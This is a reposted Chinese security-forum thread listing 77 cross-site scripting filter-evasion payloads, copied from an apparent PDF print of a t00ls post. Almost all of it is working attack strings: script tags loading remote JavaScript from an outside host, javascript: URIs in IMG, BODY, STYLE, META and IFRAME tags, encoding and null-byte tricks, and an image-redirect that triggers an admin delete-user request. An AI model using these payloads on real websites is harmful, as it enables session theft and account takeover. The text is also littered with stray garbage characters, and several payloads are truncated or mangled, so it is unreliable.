貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
: K" W4 o4 X! I i4 C(1)普通的XSS JavaScript注入: L6 \! R _/ X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 ]7 G4 Q& u0 }# K) N$ K7 k
(2)IMG标签XSS使用JavaScript命令! j0 ]1 p9 _! g; X, N9 B" x
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 j. r+ M+ d8 V1 @ {) T(3)IMG标签无分号无引号
/ n1 l v% i% g( C<IMG SRC=javascript:alert(‘XSS’)>" s) U$ B. Y% [' W2 y6 [
(4)IMG标签大小写不敏感$ G7 M8 i6 \+ s2 }
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 Z$ K* \- ~; i" o" M2 O( G(5)HTML编码(必须有分号)
* F" \9 s9 p0 s k# M( \9 U/ `<IMG SRC=javascript:alert(“XSS”)>- z, L3 E* G- I: s! j6 |
(6)修正缺陷IMG标签1 B A6 _' q$ F; d; C6 H
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 R. ]! ]4 ?3 N% M8 i
! J6 R, o5 @% e$ r1 ~$ s; ?9 y* o4 t" Q9 W
(7)formCharCode标签(计算器)# q: A4 _: u7 `: b2 f' T3 E
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# J6 K: `- B+ W2 ]1 ?7 @(8)UTF-8的Unicode编码(计算器)2 _2 G+ B5 M5 J1 d& G
<IMG SRC=jav..省略..S')>
& G) l+ P4 }; X5 M+ n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
. C# p. q7 a: D4 I<IMG SRC=jav..省略..S')>
! J. x& O& O5 b! K/ s3 ?. d(10)十六进制编码也是没有分号(计算器)
! |3 }9 l0 J3 C" l1 e<IMG SRC=java..省略..XSS')>! i; ]7 S' h i9 Z4 `. U' C0 G ~; E' C
(11)嵌入式标签,将Javascript分开 f( {5 H1 g+ Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# L! i. i2 j/ m- O! F/ q9 x(12)嵌入式编码标签,将Javascript分开& p% l6 N: y7 i) ^5 V) H% u+ h
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ ^; K# `; F& d' a7 d(13)嵌入式换行符
, s1 ]* d, j+ `' e+ n7 g$ t2 u# ~<IMG SRC=”jav ascript:alert(‘XSS’);”>, X! ^: t5 h4 I U2 ^3 w+ S
(14)嵌入式回车8 f; x4 ^0 f5 l5 ?. o0 U0 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>) Q- N: G# z) p- R+ y
(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 h" o' D7 @3 ?! V9 y$ q7 o
<IMG SRC=”javascript:alert(‘XSS‘)”>$ h- P, ~8 }" ~, X4 p
(16)解决限制字符(要求同页面)
/ N! e0 J+ X- S5 E<script>z=’document.’</script>
6 n4 E5 t. ^+ z5 T9 J/ Z/ y0 z4 I<script>z=z+’write(“‘</script>; K6 [/ S9 B- P, E$ N0 r; X
<script>z=z+’<script’</script>
7 u6 o5 {1 k1 n<script>z=z+’ src=ht’</script>
' I& n# j$ b4 _5 c1 a! Q" ?2 i/ a<script>z=z+’tp://ww’</script>
* g, u/ V4 `1 ?) v( J. p<script>z=z+’w.shell’</script>: T% q0 F5 T' n
<script>z=z+’.net/1.’</script>1 z( x. ^- L" ?5 D6 m4 g
<script>z=z+’js></sc’</script>
; w- s- \: z2 M5 \# Z3 F" {! g U<script>z=z+’ript>”)’</script>
+ ]; p* M r2 p5 @, S<script>eval_r(z)</script>
/ f3 h+ l. N4 t. t8 T(17)空字符12-7-1 T00LS - Powered by Discuz! Board. _6 ]; P& o- ~$ j9 ?
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 L. b4 L3 t0 ?1 qperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 ?1 [+ B2 D0 _% w( l) s9 w1 Q% p(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ ?$ Z5 _( ]( ~- Q/ @1 k/ Iperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 ~# D1 g3 J" p& B" u0 N0 w(19)Spaces和meta前的IMG标签
3 ~6 N: q8 h1 H<IMG SRC=” javascript:alert(‘XSS’);”>
' i* A* B0 S; D8 I" L7 M0 q5 O1 g: ^(20)Non-alpha-non-digit XSS7 Z+ S' H" ~) M5 A3 a9 d2 [+ R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! B; L v j8 g' O4 b(21)Non-alpha-non-digit XSS to 2 ~. T7 w) }+ X6 X" K |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ h, @8 o3 R# O, Y(22)Non-alpha-non-digit XSS to 3
) V6 S$ O" C2 `/ N5 W# M9 ~<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* a' ^. U' z2 I& t! w- l
(23)双开括号
* r4 z3 [5 D7 u! G2 ~<<SCRIPT>alert(“XSS”);//<</SCRIPT>6 Q+ d/ E" t6 i5 I
(24)无结束脚本标记(仅火狐等浏览器)
4 a; e" D3 E* O' g5 M+ z: Q& E: }<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. O/ X; p! P2 _2 S7 T( R/ B
(25)无结束脚本标记2! r$ R' ]" }8 x& K; y9 t" w- x: C
<SCRIPT SRC=//3w.org/XSS/xss.js>4 v7 B4 T% Z. Y7 n4 q- }9 B
(26)半开的HTML/JavaScript XSS
) B u+ O% f+ z& H* u" @2 Z<IMG SRC=”javascript:alert(‘XSS’)”5 |& J9 h' a1 U0 g; Y
(27)双开角括号
- s Z# r% X: b1 O' c3 D5 k<iframe src=http://3w.org/XSS.html <7 l* A: v9 C% u. m& ?/ n
(28)无单引号 双引号 分号
+ C+ a: N" ~9 w; d( R) X6 P' S" b1 {# f<SCRIPT>a=/XSS/5 C$ t3 P7 A* s! t/ p$ o# r Y% F
alert(a.source)</SCRIPT>1 I$ T$ H' V7 j/ \7 |
(29)换码过滤的JavaScript; P) A. i5 h) Y8 X/ U' j F# |
\”;alert(‘XSS’);//
, g2 L, r4 ~, {5 b. Z X9 }7 T(30)结束Title标签$ }4 W/ q) {$ e4 x5 h
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 T; i' x- h! h$ Y0 d- H
(31)Input Image
# L) l) r- W q6 b$ w<INPUT SRC=”javascript:alert(‘XSS’);”># G/ _* l+ P0 ?
(32)BODY Image
( y3 m* h$ U4 v<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, I1 }$ d4 q7 v) ^(33)BODY标签
. A, G; I/ }$ z<BODY(‘XSS’)>3 C( F! _( T. F# U2 H, U; U6 O/ j; c
(34)IMG Dynsrc
" z: U% V7 [$ J( p! A; w( J4 k$ r<IMG DYNSRC=”javascript:alert(‘XSS’)”>, m" z9 _/ x9 B- B! G
(35)IMG Lowsrc
$ i/ F+ t0 R' h4 y* q* ?5 z<IMG LOWSRC=”javascript:alert(‘XSS’)”>9 _4 w) N6 y/ F( E. V2 v
(36)BGSOUND" _7 l& \5 L. o- i. [ B: H. u
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( G- n/ |5 d8 N% ~. W(37)STYLE sheet. P& W* Z5 |9 W# K7 ?' C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 L- X8 C% P* F. F' a
(38)远程样式表
8 c( I& H2 b3 ]# I' k* Q% F<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ P0 j( w- i0 r% _( g. g(39)List-style-image(列表式)
6 k$ V0 W" Y2 M# a+ `. J<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! S4 ^* T0 V0 z$ _2 o) n5 b" M(40)IMG VBscript
5 }( ^6 v2 G0 o/ B x<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS+ H3 k$ X) F- v0 Q# Y! g
(41)META链接url1 X4 y5 W) w, }' v* q
5 @9 I( k- t5 p1 o
, K3 d* W2 ?( f$ q& `0 I3 A+ C: U
<META HTTP-EQUIV=”refresh” CONTENT=”0;
+ N4 A* A9 v2 R, ^URL=http://;URL=javascript:alert(‘XSS’);”>
: i: K" O. n/ f& Z(42)Iframe
* J7 a$ B) H9 U. o<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 h" X+ \0 a1 ?' t U. R# e(43)Frame
; c& |, h# E2 U2 b; d. k' G2 o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board( U4 N3 y5 q+ A; \# D7 }- Q
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, S( ]) L* P& \% S a q) b8 L
(44)Table
0 a4 Z+ N- [. f7 M' a<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 {: d6 A8 U+ {+ @$ P0 \+ j(45)TD+ A' C% R7 x/ h, q5 C" ^6 O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* B d+ J7 I9 u) r) F( E$ r( Z
(46)DIV background-image
9 ?& O, m4 ?; W% e<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) Q, W- s5 ?1 a8 s. w- ~* y' c
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
% `, W1 T, X& T7 U8&13&12288&65279)1 }& B6 m1 }2 u6 ?/ ~
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># H7 H' L ~9 Q5 u* e
(48)DIV expression
3 j, X5 f" L+ \: D$ `5 j0 C4 t<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
q+ F+ ~8 ^" ~) e(49)STYLE属性分拆表达' |3 A; s6 k2 J" i% C. J, L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 V7 N5 Z. F7 s$ }& _( T(50)匿名STYLE(组成:开角号和一个字母开头)
# {- |! Y B* d5 ^* W3 X- Q* |<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& y# \2 z& L" y) C! p
(51)STYLE background-image
4 t7 y/ p+ l9 k* m. U<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A! t- j, p; Z4 \7 i& T0 ^
CLASS=XSS></A>
; @- H4 I' i8 \0 I0 `(52)IMG STYLE方式
, ~1 e g# u( h# r Mexppression(alert(“XSS”))’>, _* o. f3 d0 {8 x! @
(53)STYLE background9 M* D, H/ `4 X. Q: c+ @
<STYLE><STYLE
) h$ i5 c# [# I' A' t& n% S1 jtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: u2 r/ u: f9 z5 A1 f6 @* F( f
(54)BASE# l& o6 L- }2 Y: S
<BASE HREF=”javascript:alert(‘XSS’);//”>6 i6 U/ e* W& {6 P1 L @% {4 d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS g* z& l. V! }3 t
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
. ^7 E, |2 g. k3 j2 n9 ?% m" I+ J% i6 W(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 p4 ]1 a' D$ Ia=”get”;
1 m& Z: B5 G/ f3 }+ D# d, pb=”URL(\”";8 J9 u+ e# w5 u% W: ]2 l
c=”javascript:”;" c8 a* f$ ~/ z) U# V4 T- L6 P/ C5 F) \
d=”alert(‘XSS’);\”)”;
; R# c* Q3 t. Y9 U& _7 @, w9 ~eval_r(a+b+c+d);
* _" S4 v/ W' G9 a V$ s% a(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上# m$ e" Y) w6 F( b: u- U, o
<HTML xmlns:xss>0 i7 k2 D& n7 R. B
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
1 z1 P2 Z* i2 m) h( o<xss:xss>XSS</xss:xss>
+ g3 p" H/ b" Z& m- v</HTML>8 C; J7 Z+ C: Q# k" d. C2 Q, y @
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用1 g9 t* z; N I( ^1 _4 J
<SCRIPT SRC=””></SCRIPT>
4 q/ l0 ~% ?9 s(59)IMG嵌入式命令,可执行任意命令
/ g! ^8 S; p& Z% @ x" Q; W }* _/ G0 ~& }<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ ]: Z; a) z# [( P) N(60)IMG嵌入式命令(a.jpg在同服务器)0 s. H9 H# Z3 B2 I2 P' f& d
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
v% L% T* C6 \1 B8 W: B(61)绕符号过滤1 {4 o8 k% y8 I' o) C! w. u
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ ^- U, u3 H# h0 @- w0 C(62)3 Z* Y6 m7 X1 e3 A
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* g- C0 t. U; n& F: {& H4 l3 k {
(63)5 |/ b1 h$ v. z2 L
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 x2 @1 Z5 \6 {(64)
, h8 X! Q5 x) }4 t8 B0 h- B<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% M% @- |) X% \# J' v- Y(65)
; c- S P# D8 O9 z# }4 K<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 @' w6 w# a8 f6 ^5 m" I(66)12-7-1 T00LS - Powered by Discuz! Board
7 }5 J' D7 e6 K h6 l4 Ehttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
1 a' T6 L( ~2 D. {) @<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 Q k" u- s6 ?
(67)% |7 i; r$ D( {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>/ |7 |; b/ o, [ d- I8 f
</SCRIPT>
6 o3 O" l* D8 _+ W1 o(68)URL绕行7 n0 R, e& T; F
<A HREF=”http://127.0.0.1/”>XSS</A>' i" _4 f$ A' L
(69)URL编码
7 k. Z- T& H& k8 o! C* b<A HREF=”http://3w.org”>XSS</A>' P6 Z; C5 F. y1 ]) J
(70)IP十进制
& H- G9 g) y8 R" Y6 B<A HREF=”http://3232235521″>XSS</A>
5 Q+ s2 X) c0 E u$ l6 z9 b! V(71)IP十六进制' W, J+ _/ O+ { i5 a' E4 K
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
- n9 U3 O- v7 }: x% G(72)IP八进制
: K! v( q: U4 a7 N2 v( \$ o<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 |" ?+ I6 L% \(73)混合编码9 K0 ?; H; m1 q
<A HREF=”h
1 p" T$ i& y( Qtt p://6 6.000146.0×7.147/”">XSS</A>3 d! D4 X4 n9 G4 p& V5 @/ Z
(74)节省[http:]& ^* Z- g6 c S3 m# T
<A HREF=”//www.google.com/”>XSS</A>' M" a/ g( q5 @" m! i) n
(75)节省[www]6 I# C( P" a+ \5 {
<A HREF=”http://google.com/”>XSS</A>
2 F2 _# u7 ?6 _6 U" v(76)绝对点绝对DNS( q/ g# Y" b0 S) Z
<A HREF=”http://www.google.com./”>XSS</A>
& M% V) H/ A& r* f+ R" }(77)javascript链接
) O S4 q( E/ Q; H& q<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
! @( k; ^9 _+ B5 Y* K8 S; x% M
, y: L/ Y; h. }/ u, k原文地址:http://fuzzexp.org/u/0day/?p=14
' K% T2 E. K% h/ c$ x* ^; Y, H; Q( j5 W! z
|
发表于 2013-4-19 19:22:37
收藏
支持
反对